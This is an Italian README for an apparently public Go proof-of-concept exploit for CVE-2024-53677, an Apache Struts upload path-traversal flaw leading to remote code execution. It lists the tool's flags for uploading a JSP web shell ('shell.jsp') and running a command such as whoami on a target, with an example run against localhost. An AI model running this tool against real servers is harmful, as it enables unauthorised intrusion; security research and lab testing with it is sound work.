
una prova di concetto di CVE-2024-53677
Una vecchia vulnerabilità che colpisce Apache Struts portando a LFI ed esecuzione remota.
Apache Struts path traversal → RCE (CVE-2024-53677)
Ho dedicato molto tempo per rendere questo strumento il più personalizzabile possibile perché quando ho incontrato per la prima volta questa CVE non ho trovato una buona fonte che la implementasse correttamente. La maggior parte dei flag ha valori predefiniti, quindi non lasciarti scoraggiare da tutti questi flag.
git clone https://github.com/Cythonic1/CVE-2024-53677-POC
cd CVE-2024-53677-POC
go run . -h
-command string
command to execute on the server default: whoami
-end-point string
post endpoint default to: upload.action
-file-location string
where to save the file into the server default: what test function return
-lfi-param string
Parameter name for LFI testing default: top.UploadFileName
-payload-file string
Path to the payload file default: ./shell.jsp
-payload-file-name string
name of the payload it self default: shell.jsp
-payload-param string
Parameter name for payload injection default: Upload
-test-file-name string
name of the testfile it self default: testfile.txt
-testing-file string
File used for testing default: ./testfile.txt
-url string
Target base URL (format http://strutted.htb/) do not forgot the [/] at the end
Tutti questi comandi hanno valori predefiniti. Ho anche implementato una funzione di test per verificare dove posizionare il file ed è anche un'opzione configurabile dall'utente.
go run . -url http://127.0.0.1:8080/ -end-point upload.action
Poche cose da notare.
Sentiti libero di modificare o aggiungere all'exploit ♥️.